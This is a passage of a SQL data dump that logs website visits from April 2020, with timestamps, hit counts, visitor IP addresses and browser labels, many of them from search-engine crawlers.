hrome'),(497141,1586800821,1,1,0,0,'213.179.252.63','chrome'),(497142,1586800826,1,1,0,0,'94.153.77.205','chrome'),(497143,1586800930,1,1,0,0,'91.196.178.5','chrome'),(497144,1586800954,1,1,0,0,'91.196.178.124','chrome'),(497145,1586800988,1,1,0,0,'91.196.178.141','chrome'),(497146,1586801002,1,1,0,0,'91.196.178.116','chrome'),(497147,1586801066,2,2,0,0,'82.145.210.63','other'),(497148,1586801103,1,1,0,0,'91.196.178.133','chrome'),(497149,1586801184,1,1,0,0,'178.95.157.137','chrome'),(497150,1586801428,1,1,0,0,'37.52.114.27','chrome'),(497151,1586801469,1,1,0,0,'212.113.43.226','chrome'),(497152,1586801538,2,2,0,0,'157.55.39.248','other'),(497153,1586801685,1,1,0,0,'8.29.198.25','other'),(497154,1586802177,1,1,0,0,'46.211.3.117','other'),(497155,1586802215,1,1,0,0,'178.209.153.156','chrome'),(497156,1586802221,1,1,0,0,'8.29.198.26','other'),(497157,1586802252,1,1,0,0,'91.196.178.1','chrome'),(497158,1586802270,1,1,0,0,'54.36.149.93','other'),(497159,1586802313,1,1,0,0,'91.196.178.180','chrome'),(497160,1586802381,1,1,0,0,'91.196.178.40','chrome'),(497161,1586802493,1,1,0,0,'128.124.151.141','chrome'),(497162,1586802656,1,1,0,0,'91.196.177.151','chrome'),(497163,1586802747,1,1,0,0,'88.155.154.15','chrome'),(497164,1586802824,1,1,0,0,'95.133.150.69','chrome'),(497165,1586802897,1,1,0,0,'178.95.246.100','chrome'),(497166,1586802908,1,1,0,0,'94.153.22.55','chrome'),(497167,1586802940,1,1,0,0,'77.120.31.46','chrome'),(497168,1586802965,1,1,0,0,'207.46.13.34','other'),(497169,1586803000,1,1,0,0,'37.55.226.249','chrome'),(497170,1586803268,1,1,0,0,'54.36.149.39','other'),(497171,1586803344,1,1,0,0,'95.134.116.72','chrome'),(497172,1586803581,1,1,0,0,'78.111.190.177','chrome'),(497173,1586803644,2,2,0,0,'207.46.13.68','other'),(497174,1586803663,1,1,0,0,'88.155.182.18','chrome'),(497175,1586803687,1,1,0,0,'31.13.115.13','other'),(497176,1586803697,1,1,0,0,'173.91.36.67','other'),(497177,1586803845,1,1,0,0,'46.211.131.64','other'),(497178,1586804208,1,1,0,0,'46.211.33.122','chrome'),(497179,1586804256,1,1,0,0,'91.196.178.58','chrome'),(497180,1586804269,1,1,0,0,'54.36.38.120','firefox'),(497181,1586804359,2,2,0,0,'213.180.203.16','other'),(497182,1586804380,1,1,0,0,'176.105.196.96','other'),(497183,1586804457,1,1,0,0,'66.249.64.23','chrome'),(497184,1586804522,1,1,0,0,'207.46.13.34','other'),(497185,1586804540,1,1,0,0,'91.196.178.189','chrome'),(497186,1586804580,1,1,0,0,'178.154.200.196','other'),(497187,1586804635,1,1,0,0,'92.113.174.207','firefox'),(497188,1586804657,1,1,0,0,'157.55.39.206','other'),(497189,1586804808,1,1,0,0,'37.73.25.103','chrome'),(497190,1586804874,1,1,0,0,'91.196.178.91','chrome'),(497191,1586805011,1,1,0,0,'91.196.178.29','chrome'),(497192,1586805015,2,2,0,0,'95.134.169.246','chrome'),(497193,1586805101,1,1,0,0,'66.249.64.24','chrome'),(497194,1586805399,1,1,0,0,'185.151.174.89','chrome'),(497195,1586805452,1,1,0,0,'95.158.3.84','chrome'),(497196,1586805581,1,1,0,0,'66.249.64.25','chrome'),(497197,1586805993,1,1,0,0,'91.196.178.130','other'),(497198,1586806008,1,1,0,0,'91.196.178.47','chrome'),(497199,1586806118,8,8,0,0,'77.120.98.235','other'),(497200,1586806155,1,1,0,0,'195.10.210.70','chrome'),(497201,1586806189,1,1,0,0,'173.252.111.13','other'),(497202,1586806190,1,1,0,0,'173.252.111.4','other'),(497203,1586806207,1,1,0,0,'173.252.111.11','other'),(497204,1586806228,1,1,0,0,'173.252.111.10','other'),(497205,1586806312,1,1,0,0,'93.74.75.226','other'),(497206,1586806323,2,2,0,0,'207.46.13.68','other'),(497207,1586806462,1,1,0,0,'178.154.200.222','other'),(497208,1586806527,1,1,0,0,'95.134.202.117','chrome'),(497209,1586806728,1,1,0,0,'91.196.178.38','chrome'),(497210,1586806786,1,1,0,0,'91.196.178.100','chrome'),(497211,1586806932,1,1,0,0,'91.196.178.175','chrome'),(497212,1586807147,1,1,0,0,'157.55.39.206','other'),(497213,1586807172,1,1,0,0,'91.196.178.68','chrome'),(497214,1586807232,1,1,0,0,'173.252.127.10','other'),(497215,1586807233,1,1,0,0,'173.252.127.5','other'),(497216,1586807309,1,1,0,0,'91.196.178.15','other'),(497217,1586807340,1,1,0,0,'94.43.90.37','chrome'),(497218,1586807404,1,1,0,0,'46.211.7.122','chrome'),(497219,1586807412,1,1,0,0,'128.72.68.123','chrome'),(497220,1586807435,1,1,0,0,'66.249.70.36','chrome'),(497221,1586807474,1,1,0,0,'91.196.178.187','chrome'),(497222,1586807599,1,1,0,0,'195.216.204.87','firefox'),(497223,1586807777,1,1,0,0,'66.249.64.24','chrome'),(497224,1586807821,1,1,0,0,'130.180.218.15','chrome'),(497225,1586808021,1,1,0,0,'207.46.13.34','other'),(497226,1586808148,1,1,0,0,'78.111.189.132','chrome'),(497227,1586808426,1,1,0,0,'178.95.244.73','chrome'),(497228,1586808632,1,1,0,0,'91.196.178.188','chrome'),(497229,1586808701,1,1,0,0,'207.46.13.68','other'),(497230,1586808722,1,1,0,0,'173.252.83.19','other'),(497231,1586808843,1,1,0,0,'91.196.178.84','chrome'),(497232,1586808900,2,2,0,0,'157.55.39.206','other'),(497233,1586809056,1,1,0,0,'178.154.200.222','other'),(497234,1586809282,1,1,0,0,'91.196.178.178','chrome'),(497235,1586809360,1,1,0,0,'91.196.178.162','chrome'),(497236,1586809750,1,1,0,0,'5.18.163.100','chrome'),(497237,1586809866,1,1,0,0,'207.46.13.34','other'),(497238,1586809917,2,2,0,0,'95.213.141.126','opera'),(497239,1586809933,1,1,0,0,'95.133.192.152','chrome'),(497240,1586810647,1,1,0,0,'91.196.178.33','chrome'),(497241,1586810827,1,1,0,0,'91.196.178.77','chrome'),(497242,1586810870,1,1,0,0,'91.196.178.161','chrome'),(497243,1586810987,1,1,0,0,'66.249.64.24','chrome'),(497244,1586811119,1,1,0,0,'188.190.228.202','chrome'),(497245,1586811186,1,1,0,0,'66.249.64.23','chrome'),(497246,1586811983,1,1,0,0,'66.249.64.25','chrome'),(497247,1586812511,1,1,0,0,'91.196.178.180','chrome'),(497248,1586812525,2,2,0,0,'8.29.198.27','other'),(497249,1586813096,1,1,0,0,'37.73.120.110','chrome'),(497250,1586813198,1,1,0,0,'207.46.13.68','other'),(497251,1586813259,1,1,0,0,'91.196.178.57','chrome'),(497252,1586813271,1,1,0,0,'91.196.178.25','chrome'),(497253,1586813291,1,1,0,0,'46.29.224.60','chrome'),(497254,1586813306,1,1,0,0,'37.73.19.125','chrome'),(497255,1586813363,2,2,0,0,'66.249.64.23','chrome'),(497256,1586813422,1,1,0,0,'185.138.231.198','chrome'),(497257,1586813553,1,1,0,0,'66.249.70.36','chrome'),(497258,1586813618,1,1,0,0,'46.211.8.116','chrome'),(497259,1586813731,1,1,0,0,'66.249.64.25','chrome'),(497260,1586814259,1,1,0,0,'207.46.13.34','other'),(497261,1586814313,1,1,0,0,'207.46.13.68','other'),(497262,1586815037,1,1,0,0,'91.196.178.80','chrome'),(497263,1586815328,1,1,0,0,'213.180.203.50','other'),(497264,1586815379,1,1,0,0,'207.46.13.68','other'),(497265,1586815390,1,1,0,0,'178.159.37.88','chrome'),(497266,1586815728,1,0,1,0,'157.55.39.206',''),(497267,1586815754,2,2,0,0,'66.249.64.23','chrome'),(497268,1586815969,1,1,0,0,'66.249.64.24','chrome'),(497269,1586816264,1,1,0,0,'91.196.178.76','chrome'),(497270,1586816448,1,1,0,0,'188.163.74.42','chrome'),(497271,1586817619,1,1,0,0,'46.4.33.48','other'),(497272,1586817686,1,1,0,0,'66.249.70.36','chrome'),(497273,1586817727,1,1,0,0,'207.46.13.68','other'),(497274,1586817792,1,1,0,0,'31.13.115.8','other'),(497275,1586818201,2,2,0,0,'178.154.200.222','other'),(497276,1586818477,1,0,1,0,'157.55.39.206',''),(497277,1586818581,2,2,0,0,'195.154.242.89','chrome'),(497278,1586818747,1,1,0,0,'207.46.13.68','other'),(497279,1586818996,1,1,0,0,'46.211.49.73','chrome'),(497280,1586819346,1,1,0,0,'213.180.203.16','other'),(497281,1586819881,1,1,0,0,'13.66.139.0','other'),(497282,1586821660,1,1,0,0,'95.251.210.186','chrome'),(497283,1586821987,1,1,0,0,'207.46.13.68','other'),(497284,1586822106,1,1,0,0,'62.205.134.182','other'),(497285,1586822554,1,1,0,0,'157.55.39.206','other'),(497286,1586822699,2,2,0,0,'66.249.64.24','chrome'),(497287,1586822755,1,1,0,0,'207.46.13.34','other'),(497288,1586823363,1,1,0,0,'8.29.198.25','other'),(497289,1586823874,1,1,0,0,'8.29.198.26','other'),(497290,1586824073,8,8,0,0,'77.120.98.235','other'),(497291,1586824086,1,1,0,0,'157.55.39.206','other'),(497292,1586824232,1,1,0,0,'66.249.64.23','chrome'),(497293,1586824869,1,1,0,0,'88.155.178.148','chrome'),(497294,1586825719,1,1,0,0,'66.249.64.23','chrome'),(497295,1586826209,1,1,0,0,'66.249.64.25','chrome'),(497296,1586826542,1,1,0,0,'54.36.149.86','other'),(497297,1586826853,1,1,0,0,'66.249.70.38','chrome'),(497298,1586826882,1,1,0,0,'185.183.96.122','chrome'),(497299,1586827230,1,1,0,0,'54.36.149.4','other'),(497300,1586828033,1,1,0,0,'94.130.9.183','other'),(497301,1586828493,1,1,0,0,'66.249.70.38','chrome'),(497302,1586828984,1,0,1,0,'66.249.64.24',''),(497303,1586829061,1,1,0,0,'92.38.136.69','chrome'),(497304,1586829156,1,1,0,0,'91.196.178.28','chrome'),(497305,1586829230,1,1,0,0,'66.249.64.23','chrome'),(497306,1586829281,1,1,0,0,'178.154.200.222','other'),(497307,1586830395,1,1,0,0,'66.249.64.23','chrome'),(497308,1586830458,1,1,0,0,'54.36.149.59','other'),(497309,1586830824,1,1,0,0,'66.249.70.38','chrome'),(497310,1586830870,1,0,1,0,'66.249.64.25',''),(497311,1586830907,1,1,0,0,'18.204.220.94','chrome'),(497312,1586831433,1,1,0,0,'54.36.149.54','other'),(497313,1586831684,1,1,0,0,'94.153.71.80','chrome'),(497314,1586831876,1,1,0,0,'54.36.149.38','other'),(497315,1586831930,1,1,0,0,'178.154.200.222','other'),(497316,1586832039,1,1,0,0,'157.55.39.206','other'),(497317,1586832086,2,2,0,0,'91.196.178.88','chrome'),(497318,1586832944,1,1,0,0,'173.252.127.3','other'),(497319,1586833074,1,0,1,0,'207.46.13.68',''),(497320,1586833584,1,1,0,0,'66.249.64.23','chrome'),(497321,1586833990,1,1,0,0,'37.73.109.76','chrome'),(497322,1586834101,1,1,0,0,'178.154.200.236','other'),(497323,1586834198,1,1,0,0,'8.29.198.25','other'),(497324,1586834248,1,1,0,0,'66.249.64.25','chrome'),(497325,1586834266,1,1,0,0,'207.46.13.68','other'),(497326,1586834276,1,1,0,0,'178.154.200.220','other'),(497327,1586834414,1,1,0,0,'157.55.39.206','other'),(497328,1586834453,1,1,0,0,'202.133.247.208','other'),(497329,1586834701,1,1,0,0,'8.29.198.26','other'),(497330,1586836348,1,1,0,0,'37.115.196.177','chrome'),(497331,1586836392,1,1,0,0,'91.196.178.108','chrome'),(497332,1586837439,1,1,0,0,'37.54.114.163','chrome'),(497333,1586837927,3,3,0,0,'51.83.207.97','other'),(497334,1586837970,1,1,0,0,'213.180.203.16','other'),(497335,1586838037,1,1,0,0,'91.124.183.128','firefox'),(497336,1586838163,1,1,0,0,'157.55.39.206','other'),(497337,1586838381,1,1,0,0,'37.115.196.177','chrome'),(497338,1586839169,1,1,0,0,'37.73.2.154','chrome'),(497339,1586839213,1,1,0,0,'66.249.64.25','chrome'),(497340,1586839404,1,1,0,0,'62.205.134.182','other'),(497341,1586839565,1,1,0,0,'176.37.22.172','other'),(497342,1586839657,1,1,0,0,'66.249.64.24','chrome'),(497343,1586839693,1,1,0,0,'157.55.39.206','other'),(497344,1586839853,1,1,0,0,'207.46.13.34','other'),(497345,1586839896,1,1,0,0,'54.36.149.40','other'),(497346,1586840310,1,1,0,0,'178.133.153.75','chrome'),(497347,1586840452,1,1,0,0,'213.180.203.16','other'),(497348,1586840658,1,1,0,0,'31.13.127.22','other'),(497349,1586840659,1,1,0,0,'31.13.127.9','other'),(497350,1586840660,1,1,0,0,'31.13.127.6','other'),(497352,1586840830,1,1,0,0,'91.196.178.151','chrome'),(497353,1586840879,1,1,0,0,'91.196.178.78','chrome'),(497354,1586841323,1,1,0,0,'176.36.50.232','chrome'),(497355,1586841355,1,1,0,0,'195.10.210.49','chrome'),(497356,1586841554,1,1,0,0,'54.36.149.72','other'),(497357,1586841600,1,1,0,0,'178.154.200.222','other'),(497358,1586841648,1,1,0,0,'88.155.83.14','chrome'),(497359,1586841876,8,8,0,0,'77.120.98.235','other'),(497360,1586841961,1,1,0,0,'207.46.13.68','other'),(497361,1586842188,1,1,0,0,'91.196.178.80','chrome'),(497362,1586842557,1,1,0,0,'54.36.149.44','other'),(497363,1586842863,1,1,0,0,'91.196.178.161','chrome'),(497364,1586842907,1,0,1,0,'66.249.64.24',''),(497365,1586842934,1,1,0,0,'37.54.19.123','chrome'),(497366,1586843150,1,1,0,0,'178.154.200.222','other'),(497367,1586843455,1,1,0,0,'54.36.149.25','other'),(497368,1586843700,1,1,0,0,'91.196.178.131','chrome'),(497369,1586843842,2,2,0,0,'66.249.64.24','chrome'),(497370,1586843907,1,1,0,0,'91.196.178.171','chrome'),(497371,1586844094,1,0,1,0,'207.46.13.68',''),(497372,1586844519,1,1,0,0,'91.196.178.80','chrome'),(497373,1586844534,1,1,0,0,'188.191.101.96','other'),(497374,1586844656,1,1,0,0,'54.36.149.19','other'),(497375,1586844774,1,1,0,0,'54.36.149.50','other'),(497376,1586844939,1,1,0,0,'209.17.97.90','other'),(497377,1586845032,1,1,0,0,'8.29.198.25','other'),(497378,1586845035,1,1,0,0,'91.196.178.171','chrome'),(497379,1586845160,1,1,0,0,'207.46.13.68','other'),(497380,1586845523,1,1,0,0,'8.29.198.27','other'),(497381,1586845795,1,1,0,0,'94.153.108.30','chrome'),(497382,1586845940,1,1,0,0,'91.235.71.123','chrome'),(497383,1586846050,1,0,1,0,'66.249.64.25',''),(497384,1586846356,1,1,0,0,'66.249.64.24','chrome'),(497385,1586846667,1,1,0,0,'176.121.9.240','chrome'),(497386,1586846991,1,1,0,0,'178.154.200.220','other'),(497387,1586847057,1,1,0,0,'91.196.178.48','chrome'),(497388,1586847175,1,1,0,0,'54.36.149.13','other'),(497389,1586847252,1,1,0,0,'94.153.16.68','chrome'),(497390,1586847511,1,1,0,0,'91.196.178.65','chrome'),(497391,1586847513,1,1,0,0,'157.55.39.206','other'),(497392,1586847732,1,1,0,0,'207.46.13.34','other'),(497393,1586847821,1,1,0,0,'178.154.200.222','other'),(497394,1586848134,5,5,0,0,'66.249.64.23','chrome'),(497395,1586848272,4,4,0,0,'66.249.70.38','chrome'),(497396,1586848287,2,2,0,0,'66.249.70.36','chrome'),(497397,1586848303,4,4,0,0,'66.249.64.24','chrome'),(497398,1586848318,7,7,0,0,'66.249.70.33','chrome'),(497399,1586848364,5,5,0,0,'66.249.64.25','chrome'),(497400,1586848815,2,2,0,0,'91.196.177.15','other'),(497401,1586848981,1,1,0,0,'91.196.178.109','chrome'),(497402,1586849014,1,1,0,0,'94.153.6.84','chrome'),(497403,1586849380,1,1,0,0,'91.196.178.186','chrome'),(497404,1586849636,2,2,0,0,'66.249.64.24','chrome'),(497405,1586849687,1,1,0,0,'176.111.33.18','firefox'),(497406,1586849696,1,1,0,0,'157.55.39.206','other'),(497407,1586849774,2,2,0,0,'66.249.64.25','chrome'),(497408,1586850142,2,2,0,0,'66.249.64.23','chrome'),(497409,1586850203,1,1,0,0,'54.36.149.93','other'),(497410,1586850322,1,1,0,0,'207.46.13.68','other'),(497411,1586850508,1,1,0,0,'91.196.178.65','firefox'),(497412,1586850587,2,2,0,0,'66.249.64.24','chrome'),(497413,1586850772,1,1,0,0,'66.249.70.36','chrome'),(497414,1586850786,2,2,0,0,'66.249.64.25','chrome'),(497415,1586850878,1,1,0,0,'66.249.70.38','chrome'),(497416,1586850970,1,1,0,0,'66.249.70.33','chrome'),(497417,1586851323,1,1,0,0,'66.249.64.23','chrome'),(497418,1586851563,1,1,0,0,'46.211.37.0','chrome'),(497419,1586851579,2,2,0,0,'207.46.13.68','other'),(497420,1586852140,1,1,0,0,'173.252.111.16','other'),(497421,1586852142,2,2,0,0,'173.252.111.12','other'),(497424,1586852180,2,2,0,0,'173.252.111.24','other'),(497428,1586852189,2,2,0,0,'173.252.111.11','other'),(497429,1586852516,1,1,0,0,'91.196.178.117','chrome'),(497430,1586852580,2,2,0,0,'66.249.64.25','chrome'),(497431,1586852683,1,1,0,0,'46.211.34.53','chrome'),(497432,1586852733,1,0,1,0,'66.249.70.38',''),(497433,1586853105,1,1,0,0,'91.196.178.183','chrome'),(497434,1586853373,1,1,0,0,'157.55.39.206','other'),(497435,1586854051,1,1,0,0,'66.249.64.25','chrome'),(497436,1586854102,1,1,0,0,'91.196.178.55','firefox'),(497437,1586854389,1,1,0,0,'66.249.70.38','chrome'),(497438,1586854880,1,1,0,0,'46.211.55.85','chrome'),(497439,1586855549,1,1,0,0,'213.226.195.196','chrome'),(497440,1586855867,1,1,0,0,'8.29.198.25','other'),(497441,1586855932,1,1,0,0,'54.36.149.15','other'),(497442,1586855959,1,1,0,0,'46.211.16.93','chrome'),(497443,1586856276,1,1,0,0,'37.55.56.201','chrome'),(497444,1586856324,1,1,0,0,'37.54.21.107','chrome'),(497445,1586856354,1,1,0,0,'8.29.198.27','other'),(497446,1586856592,1,1,0,0,'88.155.60.3','chrome'),(497447,1586856898,1,1,0,0,'3.18.225.10','chrome'),(497448,1586857091,3,3,0,0,'91.196.177.15','other'),(497449,1586857346,1,1,0,0,'54.36.149.38','other'),(497450,1586857430,1,1,0,0,'207.46.13.34','other'),(497451,1586857562,1,1,0,0,'66.249.64.25','chrome'),(497452,1586857652,1,1,0,0,'95.132.32.251','chrome'),(497453,1586857915,1,1,0,0,'91.196.178.91','firefox'),(497454,1586858253,2,2,0,0,'194.0.138.33','chrome'),(497455,1586858543,2,2,0,0,'66.249.64.24','chrome'),(497456,1586858896,1,1,0,0,'66.249.70.33','chrome'),(497457,1586859359,1,1,0,0,'54.36.149.37','other'),(497458,1586860001,1,1,0,0,'91.196.178.179','chrome'),(497459,1586860074,1,1,0,0,'91.124.82.16','firefox'),(497460,1586860327,8,8,0,0,'77.120.98.235','other'),(497461,1586860459,1,1,0,0,'157.55.39.206','other'),(497462,1586860577,1,1,0,0,'207.46.13.34','other'),(497463,1586861476,1,1,0,0,'198.16.70.51','chrome'),(497464,1586861492,1,1,0,0,'94.153.19.183','chrome'),(497465,1586861527,2,2,0,0,'173.252.111.11','other'),(497466,1586861528,1,1,0,0,'173.252.111.16','other'),(497468,1586861536,1,1,0,0,'128.124.0.141','chrome'),(497469,1586861929,1,1,0,0,'54.36.149.41','other'),(497470,1586862028,1,1,0,0,'91.196.178.75','chrome'),(497471,1586862453,1,1,0,0,'46.133.166.74','chrome'),(497472,1586862479,1,1,0,0,'37.73.124.145','chrome'),(497473,1586862613,1,1,0,0,'173.252.111.9','other'),(497474,1586862986,1,1,0,0,'46.23.60.129','other'),(497475,1586863624,1,1,0,0,'195.10.210.70','chrome'),(497476,1586863689,1,1,0,0,'178.93.148.147','chrome'),(497477,1586863964,1,1,0,0,'94.178.7.203','chrome'),(497478,1586863986,1,1,0,0,'66.249.64.24','chrome'),(497479,1586864106,1,1,0,0,'46.133.139.158','chrome'),(497480,1586864108,1,1,0,0,'91.196.178.1','chrome'),(497481,1586864814,1,1,0,0,'91.209.11.236','other'),(497482,1586864839,1,1,0,0,'37.55.57.122','chrome'),(497483,1586865185,1,1,0,0,'157.55.39.206','other'),(497484,1586866405,1,1,0,0,'178.92.75.111','chrome'),(497485,1586866569,1,1,0,0,'207.46.13.34','other'),(497486,1586866641,1,1,0,0,'66.249.64.24','chrome'),(497487,1586866706,2,2,0,0,'8.29.198.26','other'),(497488,1586866714,1,1,0,0,'46.201.135.154','chrome'),(497489,1586866817,1,1,0,0,'54.36.149.25','other'),(497490,1586866854,1,1,0,0,'109.74.154.72','chrome'),(497491,1586866911,1,1,0,0,'46.211.34.194','chrome'),(497492,1586866918,1,1,0,0,'93.40.225.230','chrome'),(497493,1586867096,1,1,0,0,'37.73.174.174','chrome'),(497494,1586867134,1,1,0,0,'131.220.6.152','chrome'),(497495,1586867602,1,1,0,0,'37.53.227.145','chrome'),(497496,1586867701,1,1,0,0,'54.36.149.42','other'),(497497,1586867971,2,2,0,0,'66.249.64.23','chrome'),(497498,1586868002,1,1,0,0,'91.196.178.65','chrome'),(497499,1586868116,1,1,0,0,'93.73.160.193','firefox'),(497500,1586869086,1,1,0,0,'130.180.218.145','chrome'),(497501,1586869542,2,2,0,0,'88.155.45.121','chrome'),(497502,1586869878,1,1,0,0,'173.252.87.2','other'),(497503,1586870168,1,1,0,0,'94.153.22.106','chrome'),(497504,1586870297,1,1,0,0,'94.153.24.29','chrome'),(497505,1586870376,1,1,0,0,'91.196.178.179','firefox'),(497506,1586870586,1,1,0,0,'46.211.50.140','chrome'),(497507,1586870745,1,1,0,0,'207.46.13.34','other'),(497508,1586870992,1,1,0,0,'37.73.136.244','chrome'),(497509,1586871310,1,1,0,0,'54.36.149.101','other'),(497510,1586871394,1,1,0,0,'94.153.14.81','chrome'),(497511,1586871527,2,1,1,0,'157.55.39.206',''),(497512,1586871958,1,1,0,0,'5.34.31.44','chrome'),(497513,1586872008,1,1,0,0,'91.196.178.165','chrome'),(497514,1586872014,1,1,0,0,'94.153.75.32','other'),(497515,1586872450,1,1,0,0,'91.196.121.134','chrome'),(497516,1586872497,3,3,0,0,'88.155.88.182','chrome'),(497517,1586872696,1,1,0,0,'176.120.118.79','chrome'),(497518,1586872765,1,1,0,0,'178.175.132.75','chrome'),(497519,1586872772,1,1,0,0,'93.124.40.43','chrome'),(497520,1586872831,1,1,0,0,'66.249.64.25','chrome'),(497521,1586872968,1,1,0,0,'91.124.180.173','chrome'),(497522,1586873228,1,1,0,0,'37.73.158.172','chrome'),(497523,1586873652,1,1,0,0,'46.211.60.203','chrome'),(497524,1586873789,2,2,0,0,'207.46.13.34','other'),(497525,1586873847,1,1,0,0,'91.196.178.189','chrome'),(497526,1586874566,2,1,1,0,'157.55.39.206',''),(497527,1586875109,1,1,0,0,'91.196.178.134','other'),(497528,1586875111,1,1,0,0,'157.55.39.206','other'),(497529,1586875520,1,1,0,0,'178.95.159.205','chrome'),(497530,1586875650,1,1,0,0,'178.92.8.17','chrome'),(497531,1586875796,1,1,0,0,'178.154.200.222','other'),(497532,1586876084,1,1,0,0,'178.95.157.122','chrome'),(497533,1586876203,1,1,0,0,'66.249.64.25','chrome'),(497534,1586876256,1,1,0,0,'93.126.76.111','chrome'),(497535,1586876359,2,2,0,0,'195.46.35.149','chrome'),(497536,1586876787,1,1,0,0,'178.133.20.26','chrome'),(497537,1586876836,1,1,0,0,'91.196.178.44','chrome'),(497538,1586877096,1,1,0,0,'91.196.178.172','chrome'),(497539,1586877540,2,2,0,0,'8.29.198.25','other'),(497540,1586877705,1,1,0,0,'91.196.178.167','chrome'),(497541,1586878011,1,1,0,0,'91.196.178.39','other'),(497542,1586878197,1,1,0,0,'91.196.177.9','chrome'),(497543,1586878257,1,1,0,0,'91.196.178.44','chrome'),(497544,1586878365,1,1,0,0,'91.196.178.135','chrome'),(497545,1586878583,1,1,0,0,'178.154.200.97','other'),(497546,1586878886,1,1,0,0,'66.249.64.25','chrome'),(497547,1586879068,2,2,0,0,'193.109.85.12','chrome'),(497548,1586879113,1,1,0,0,'207.46.13.34','other'),(497549,1586879743,1,1,0,0,'94.153.3.111','chrome'),(497550,1586879779,1,1,0,0,'91.196.178.85','chrome'),(497551,1586880143,1,1,0,0,'66.249.70.33','chrome'),(497552,1586880612,1,1,0,0,'178.154.200.222','other'),(497553,1586880779,1,1,0,0,'37.53.110.240','chrome'),(497554,1586881090,1,1,0,0,'94.153.7.71','chrome'),(497555,1586881545,1,1,0,0,'91.196.178.185','chrome'),(497556,1586881579,1,1,0,0,'213.180.203.16','other'),(497557,1586881749,1,1,0,0,'173.252.87.7','other'),(497558,1586881790,1,1,0,0,'93.75.30.69','other'),(497559,1586882014,1,1,0,0,'77.111.244.141','chrome'),(497560,1586882489,2,2,0,0,'207.46.13.34','other'),(497561,1586882518,1,1,0,0,'91.196.178.117','chrome'),(497562,1586882563,1,1,0,0,'91.196.178.113','chrome'),(497563,1586882566,1,1,0,0,'37.73.202.182','chrome'),(497564,1586882574,1,1,0,0,'54.36.149.39','other'),(497565,1586883079,1,1,0,0,'95.132.133.185','chrome'),(497566,1586883405,1,1,0,0,'178.154.200.222','other'),(497567,1586883577,1,1,0,0,'66.249.64.23','chrome'),(497568,1586883779,1,1,0,0,'46.211.7.110','chrome'),(497569,1586883902,1,1,0,0,'173.252.111.20','other'),(497570,1586883903,1,1,0,0,'173.252.111.16','other'),(497571,1586884355,1,1,0,0,'213.180.203.17','other'),(497572,1586884597,1,1,0,0,'37.52.21.92','chrome'),(497573,1586884631,1,1,0,0,'37.73.137.106','chrome'),(497574,1586884661,1,1,0,0,'178.154.200.92','other'),(497575,1586884941,2,2,0,0,'178.154.200.222','other'),(497576,1586884976,1,1,0,0,'213.180.203.16','other'),(497577,1586885039,1,1,0,0,'93.183.220.124','chrome'),(497578,1586885075,2,2,0,0,'207.46.13.34','other'),(497579,1586885350,1,1,0,0,'157.55.39.206','other'),(497580,1586885417,1,1,0,0,'66.249.64.25','chrome'),(497581,1586885524,1,1,0,0,'54.36.149.94','other'),(497582,1586885678,1,1,0,0,'46.211.15.11','chrome'),(497583,1586885907,1,1,0,0,'66.249.64.24','chrome'),(497584,1586885915,1,1,0,0,'178.154.200.220','other'),(497585,1586887265,1,1,0,0,'91.196.178.147','chrome'),(497586,1586887490,1,1,0,0,'91.215.70.185','chrome'),(497587,1586887548,1,1,0,0,'66.249.64.23','chrome'),(497588,1586887717,1,1,0,0,'91.196.178.41','other'),(497589,1586887785,2,2,0,0,'213.180.203.16','other'),(497590,1586887835,1,1,0,0,'178.154.200.222','other'),(497591,1586888216,1,1,0,0,'91.196.178.94','firefox'),(497592,1586888217,1,0,1,0,'157.55.39.206',''),(497593,1586888375,1,1,0,0,'8.29.198.25','other'),(497594,1586888648,1,1,0,0,'65.154.226.109','msie'),(497595,1586888719,1,1,0,0,'138.246.253.10','chrome'),(497596,1586888849,1,1,0,0,'8.29.198.27','other'),(497597,1586889019,1,1,0,0,'207.46.13.34','other'),(497598,1586889215,2,2,0,0,'178.154.200.222','other'),(497599,1586889750,1,1,0,0,'66.249.64.25','chrome'),(497600,1586889896,1,1,0,0,'178.154.200.92','other'),(497601,1586890275,3,3,0,0,'178.154.200.222','other'),(497602,1586890288,1,1,0,0,'128.124.15.181','chrome'),(497603,1586890306,18,18,0,0,'192.99.7.128','other'),(497604,1586890789,1,1,0,0,'207.46.13.34','other'),(497605,1586891047,1,1,0,0,'213.180.203.16','other'),(497606,1586891380,1,1,0,0,'66.249.64.24','chrome'),(497607,1586891425,1,1,0,0,'178.154.200.222','other'),(497608,1586891761,1,1,0,0,'91.196.178.34','chrome'),(497609,1586891794,1,1,0,0,'46.133.166.22','chrome'),(497610,1586891922,1,1,0,0,'178.154.200.196','other'),(497611,1586891952,1,1,0,0,'37.73.167.28','chrome'),(497612,1586891982,1,1,0,0,'86.49.248.137','chrome'),(497613,1586892110,1,1,0,0,'213.180.203.16','other'),(497614,1586892236,1,1,0,0,'62.210.83.78','chrome'),(497615,1586892382,3,3,0,0,'178.154.200.222','other'),(497616,1586892578,1,1,0,0,'37.73.31.106','chrome'),(497617,1586893036,1,1,0,0,'66.249.64.24','chrome'),(497618,1586893189,1,1,0,0,'66.249.64.25','chrome'),(497619,1586893334,1,1,0,0,'207.46.13.34','other'),(497620,1586893634,1,1,0,0,'213.180.203.16','other'),(497621,1586893786,1,1,0,0,'107.167.107.220','other'),(497622,1586894141,1,1,0,0,'66.249.64.24','chrome'),(497623,1586894391,1,1,0,0,'213.180.203.17','other'),(497624,1586895165,1,1,0,0,'128.124.103.98','chrome'),(497625,1586895213,1,1,0,0,'157.55.39.206','other'),(497626,1586895267,1,1,0,0,'91.196.178.180','chrome'),(497627,1586895310,1,1,0,0,'91.196.178.122','chrome'),(497628,1586895489,1,1,0,0,'66.249.64.25','chrome'),(497629,1586895576,5,5,0,0,'178.154.200.222','other'),(497630,1586895930,1,1,0,0,'178.175.132.71','chrome'),(497631,1586896318,1,1,0,0,'95.133.153.38','chrome'),(497632,1586896595,1,1,0,0,'178.154.200.222','other'),(497633,1586896786,1,1,0,0,'193.111.52.3','chrome'),(497634,1586897267,1,1,0,0,'66.249.64.24','chrome'),(497635,1586897366,1,1,0,0,'178.154.200.222','chrome'),(497636,1586897409,1,1,0,0,'178.154.200.220','other'),(497637,1586897516,2,2,0,0,'178.154.200.222','other'),(497638,1586897558,1,1,0,0,'66.249.64.25','chrome'),(497639,1586897957,1,1,0,0,'213.180.203.95','other'),(497640,1586898149,1,1,0,0,'157.55.39.206','other'),(497641,1586898237,2,2,0,0,'213.180.203.16','other'),(497642,1586898747,1,1,0,0,'178.154.200.222','other'),(497643,1586898799,1,1,0,0,'195.10.210.70','chrome'),(497644,1586898999,1,1,0,0,'66.249.64.24','chrome'),(497645,1586899116,1,1,0